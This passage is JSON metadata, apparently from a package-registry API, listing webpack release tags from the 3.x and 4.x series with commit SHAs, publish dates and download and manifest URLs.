bpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea3